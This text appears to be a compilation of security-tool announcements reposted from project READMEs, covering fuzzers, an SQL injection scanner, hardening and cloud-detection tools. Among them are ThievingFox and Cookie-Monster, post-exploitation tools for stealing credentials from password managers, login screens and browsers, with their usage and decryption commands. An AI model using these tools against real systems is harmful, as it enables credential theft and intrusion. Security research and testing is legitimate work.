    NOTE: Can't be used simultaneously with -hc or -hl (yet)

    # toggle smart filter on
    bypassfuzzer.py -u https://example.com/forbidden --smart

    Specify a proxy to use

    Useful if you wanna proxy through Burp

    bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

    Skip sending header payloads or url payloads

    # skip sending headers payloads
    bypassfuzzer.py -u https://example.com/forbidden -sh
    bypassfuzzer.py -u https://example.com/forbidden --skip-headers

    # Skip sending path normailization payloads
    bypassfuzzer.py -u https://example.com/forbidden -su
    bypassfuzzer.py -u https://example.com/forbidden --skip-urls

    Hide response code/length

    Provide comma delimited lists without spaces. Examples:

    # Hide response codes
    bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

    # Hide response lengths of 638
    bypassfuzzer.py -u https://example.com/forbidden -hl 638

    TODO

    • [x] Automatically check other methods/verbs for bypass
    • [x] absolute domain attack
    • [ ] Add HTTP/2 support
    • [ ] Looking for ideas. Ping me on twitter! @intrudir


    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies: bash pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

    By: Zion3R


    HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)


    Execute Scanning Example

    Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.

    python3 HardeningMeter.py -f /bin/cp -s

    Installation Requirements

    Before installing HardeningMeter, make sure your machine has the following: 1. readelf and file commands 2. python version 3 3. pip 4. tabulate

    pip install tabulate

    Install HardeningMeter

    The very latest developments can be obtained via git.

    Clone or download the project files (no compilation nor installation is required)

    git clone https://github.com/OfriOuzan/HardeningMeter

    Arguments

    -f --file

    Specify the files you want to scan, the argument can get more than one file seperated by spaces.

    -d --directory

    Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.

    -e --external

    Specify whether you want to add external checks (False by default).

    -m --show_missing

    Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.

    -s --system

    Specify if you want to scan the system hardening methods.

    -c --csv_format'

    Specify if you want to save the results to csv file (results are printed as a table to stdout by default).

    Results

    HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

    Notes

    When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



    ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

    By: Zion3R


    ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

    The accompanying blog post can be found here


    Installation

    Linux

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    The mingw-w64 package must be installed. On Debian, this can be done using :

    apt install mingw-w64

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-gnu
    rustup target add i686-pc-windows-gnu

    Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

    After adding Mono repositories, Nuget can be installed using apt :

    apt install nuget

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11.

    Windows

    Rustup must be installed, follow the instructions available here : https://rustup.rs/

    Both x86 and x86_64 windows targets must be installed for Rust:

    rustup target add x86_64-pc-windows-msvc
    rustup target add i686-pc-windows-msvc

    .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

    Finally, python dependancies must be installed :

    pip install -r client/requirements.txt

    ThievingFox works with python >= 3.11

    NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)

    Targets

    All modules have been tested on the following Windows versions :

    Windows Version
    Windows Server 2022
    Windows Server 2019
    Windows Server 2016
    Windows Server 2012R2
    Windows 10
    Windows 11

    [!CAUTION] Modules have not been tested on other version, and are expected to not work.

    Application Injection Method
    KeePass.exe AppDomainManager Injection
    KeePassXC.exe DLL Proxying
    LogonUI.exe (Windows Login Screen) COM Hijacking
    consent.exe (Windows UAC Popup) COM Hijacking
    mstsc.exe (Windows default RDP client) COM Hijacking
    RDCMan.exe (Sysinternals' RDP client) COM Hijacking
    MobaXTerm.exe (3rd party RDP client) COM Hijacking

    Usage

    [!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

    ThievingFox contains 3 main modules : poison, cleanup and collect.

    Poison

    For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

    To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

    --mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

    --keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

    The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

    Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

    [!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

    $ python3 client/ThievingFox.py poison -h
    usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
    [--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
    [--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to poison KeePass.exe
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepassxc Try to poison KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --ke epassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to poison mstsc.exe
    --mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
    logged in (Default: False)
    --consent Try to poison Consent.exe
    --logonui Try to poison LogonUI.exe
    --rdcman Try to poison RDCMan.exe
    --rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
    logged in (Default: False)
    --mobaxterm Try to poison MobaXTerm.exe
    --mobaxterm-poison-hkcr
    Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
    logged in (Default: False)
    --all Try to poison all applications

    Cleanup

    For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

    For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

    Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

    It does not clean extracted credentials on the remote host.

    [!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

    $ python3 client/ThievingFox.py cleanup -h
    usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
    [--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
    [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of the domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Try to cleanup all poisonning artifacts related to KeePass.exe
    --keepass-share KEEPASS_SHARE
    The share on which KeePass is installed (Default: c$)
    --keepass-path KEEPASS_PATH
    The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
    --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
    --consent Try to cleanup all poisonning artifacts related to Consent.exe
    --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
    --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
    --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
    --all Try to cleanup all poisonning artifacts related to all applications

    Collect

    For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

    Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of th e domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications


    HackerInfo - Infromations Web Application Security

    By: Zion3R




    Infromations Web Application Security


    install :

    sudo apt install python3 python3-pip

    pip3 install termcolor

    pip3 install google

    pip3 install optioncomplete

    pip3 install bs4


    pip3 install prettytable

    git clone https://github.com/Matrix07ksa/HackerInfo/

    cd HackerInfo

    chmod +x HackerInfo

    ./HackerInfo -h



    python3 HackerInfo.py -d www.facebook.com -f pdf
    [+] <-- Running Domain_filter_File ....-->
    [+] <-- Searching [www.facebook.com] Files [pdf] ....-->
    https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
    https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
    https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
    https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
    h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
    https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
    https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
    https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
    https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
    #####################[Finshid]########################

    Usage:

    Hackerinfo infromations Web Application Security (11)

    Library install hackinfo:

    sudo python setup.py install
    pip3 install hackinfo



    Cookie-Monster - BOF To Steal Browser Cookies & Credentials

    By: Zion3R


    Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


    BOF Usage

    Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
    cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-moster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444
    cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
    --chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

    EXE usage

    Cookie Monster Example:
    cookie-monster.exe --all
    Cookie Monster Options:
    -h, --help Show this help message and exit
    --all Run chrome, edge, and firefox methods
    --edge Extract edge keys and download Cookies/Login Data file to PWD
    --chrome Extract chrome keys and download Cookies/Login Data file to PWD
    --firefox Locate firefox key and Cookies, does not make a copy of either file

    Decryption Steps

    Install requirements

    pip3 install -r requirements.txt

    Base64 encode the webkit masterkey

    python3 base64-encode.py "\xec\xfc...."

    Decrypt Chrome/Edge Cookies File

    python .\decrypt.py "XHh..." --cookies ChromeCookie.db

    Results Example:
    -----------------------------------
    Host: .github.com
    Path: /
    Name: dotcom_user
    Cookie: KingOfTheNOPs
    Expires: Oct 28 2024 21:25:22

    Host: github.com
    Path: /
    Name: user_session
    Cookie: x123.....
    Expires: Nov 11 2023 21:25:22

    Decrypt Chome/Edge Passwords File

    python .\decrypt.py "XHh..." --passwords ChromePasswords.db

    Results Example:
    -----------------------------------
    URL: https://test.com/
    Username: tester
    Password: McTesty

    Decrypt Firefox Cookies and Stored Credentials:
    https://github.com/lclevy/firepwd

    Installation

    Ensure Mingw-w64 and make is installed on the linux prior to compiling.

    make

    to compile exe on windows

    gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

    TO-DO

    • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

    References

    This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
    Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
    Fileless download: https://github.com/fortra/nanodump
    Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



    Python's PyPI Reveals Its Secrets

    GitGuardian is famous for its annual&nbsp;State of Secrets Sprawl&nbsp;report. In their 2023 report, they found over 10 million exposed passwords, API keys, and other credentials exposed in public GitHub commits. The takeaways in their 2024 report did not just highlight 12.8 million&nbsp;new&nbsp;exposed secrets in GitHub, but a number in the popular Python package repository&nbsp;PyPI. PyPI,

    CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

    By: Zion3R


    Permiso: https://permiso.io
    Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

    CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


    Notes

    To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

    Required Packages

    bash pip3 install -r requirements.txt

    Cloning cloudgrep locally

    To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

    bash chmod +x clone.sh ./clone.sh

    Input

    This tool offers a CLI (Command Line Interface). As such, here we review its use:

    Example 1 - Running the tool with default queries file

    Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

    Note

    Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

    {
    "AWS": [
    {
    "bucket": "cloudtrail-logs-00000000-ffffff",
    "prefix": [
    "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
    "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
    ]
    },
    {
    "bucket": "aws-kosova-us-east-1-00000000"
    }

    ],
    "AZURE": [
    {
    "accountname": "logs",
    "container": [
    "cloudgrappler"
    ]
    }
    ]
    }

    Run command

    python3 main.py

    Example 2 - Permiso Intel Use Case

    python3 main.py -p

    [+] Running GetFileDownloadUrls.*secrets_ for AWS 
    [+] Threat Actor: LUCR3
    [+] Severity: MEDIUM
    [+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

    Example 3 - Generate report

    python3 main.py -p -jo

    reports
    └── json
    β”œβ”€β”€ AWS
    β”‚Β Β  └── 2024-03-04 01:01 AM
    β”‚Β Β  └── cloudtrail-logs-00000000-ffffff--
    β”‚Β Β  └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    β”‚Β Β  └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
    └── 2024-03-04 01:01 AM
    └── logs
    └── cloudgrappler
    └── okta_key.json

    Example 4 - Filtering logs based on date or time

    python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

    Example 5 - Manually adding queries and data source types

    python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

    Example 6 - Running the tool with your own queries file

    python3 main.py -f new_file.json

    Running in your Cloud and Authentication cloudgrep

    AWS

    Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

    If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

    Azure

    The simplest way to authenticate with Azure is to first run:

    az login

    This will open a browser window and prompt you to login to Azure.



    Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

    By: Zion3R


    AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


    Star the Repo

    If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

    Features

    • Generates unique incident response scenarios based on chosen threat actor groups.
    • Allows you to specify your organisation's size and industry for a tailored scenario.
    • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
    • Create custom scenarios based on a selection of ATT&CK techniques.
    • Capture user feedback on the quality of the generated scenarios.
    • Downloadable scenarios in Markdown format.
    • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
    • Available as a Docker container image for easy deployment.
    • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


    Releases

    v0.4 (current)

    What's new? Why is it useful?
    Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
    Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
    Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
    Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

    v0.3

    What's new? Why is it useful?
    Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

    - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
    LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

    - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
    Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
    Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

    v0.2

    What's new? Why is it useful?
    Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

    - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
    User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
    Improved error handling for missing API keys - Improved user experience.
    Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

    v0.1

    Initial release.

    Requirements

    • Recent version of Python.
    • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
    • OpenAI API key.
    • LangChain API key (optional) - see LangSmith Setup section below for further details.
    • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

    Installation

    Option 1: Cloning the Repository

    1. Clone this repository:
    git clone https://github.com/mrwadams/attackgen.git
    1. Change directory into the cloned repository:
    cd attackgen
    1. Install the required Python packages:
    pip install -r requirements.txt

    Option 2: Using Docker

    1. Pull the Docker container image from Docker Hub:
    docker pull mrwadams/attackgen

    LangSmith Setup

    If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

    If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

    Data Setup

    Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

    Running AttackGen

    After the data setup, you can run AttackGen with the following command:

    streamlit run πŸ‘‹_Welcome.py

    You can also try the app on Streamlit Community Cloud.

    Usage

    Running AttackGen

    Option 1: Running the Streamlit App Locally

    1. Run the Streamlit app:
    streamlit run πŸ‘‹_Welcome.py
    1. Open your web browser and navigate to the URL provided by Streamlit.
    2. Use the app to generate standard or custom incident response scenarios (see below for details).

    Option 2: Using the Docker Container Image

    1. Run the Docker container:
    docker run -p 8501:8501 mrwadams/attackgen

    This command will start the container and map port 8501 (default for Streamlit apps) from the container to your host machine. 2. Open your web browser and navigate to http://localhost:8501. 3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Generating Scenarios

    Standard Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisatin's industry and size from the dropdown menus.
    4. Navigate to the Threat Group Scenarios page.
    5. Select the Threat Actor Group that you want to simulate.
    6. Click on 'Generate Scenario' to create the incident response scenario.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Custom Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Custom Scenario page.
    5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
    6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

    Contributing

    I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

    Licence

    This project is licensed under GNU GPLv3.



    ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

    By: Zion3R


